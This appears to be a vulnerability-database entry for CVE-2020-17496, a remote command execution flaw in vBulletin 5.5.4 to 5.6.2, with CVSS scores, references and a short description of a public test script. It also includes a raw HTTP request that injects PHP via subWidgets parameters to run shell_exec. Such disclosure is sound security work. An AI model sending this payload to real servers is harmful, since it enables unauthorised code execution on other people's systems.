Published: 12/08/2020 Updated: 26/10/2022

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 668

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

vBulletin 5.5.4 up to and including 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.

Vulnerable Product	Search on Vulmon	Subscribe to Product
vbulletin vbulletin

(CVE-2020-17496) vBulletin 5.x Widget_tabbedcontainer_tab_panel RCE Vuln Test script

vBulletin_5x-tab_panel-RCE [CVE-2020-17496] is a vulnerability in vBulletin’s ajax/render/widget_php route by injecting malicious code via the widgetConfig parameter Affected System vBulletin 554 ~ 562 vBulletin 5x Widget_tabbedcontainer_tab_panel RCE Vuln Test script Usage> python vBulletin_5x-tab_panel-RCEpy <dst_ip> <dst_port&gt

CVE-2020-17496 POST /ajax/render/widget_tabbedcontainer_tab_panel?XDEBUG_SESSION_START=phpstorm HTTP/11 Host: localhost User-Agent: curl/7540 Accept: */* Content-Length: 100 Content-Type: application/x-www-form-urlencoded subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec("pwd"); exit; CV

CWE-74 https://seclists.org/fulldisclosure/2020/Aug/5 https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/https://cwe.mitre.org/data/definitions/78.html https://nvd.nist.gov https://github.com/ludy-dev/vBulletin_5.x-tab_panel-RCE

CVE-2020-17496

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect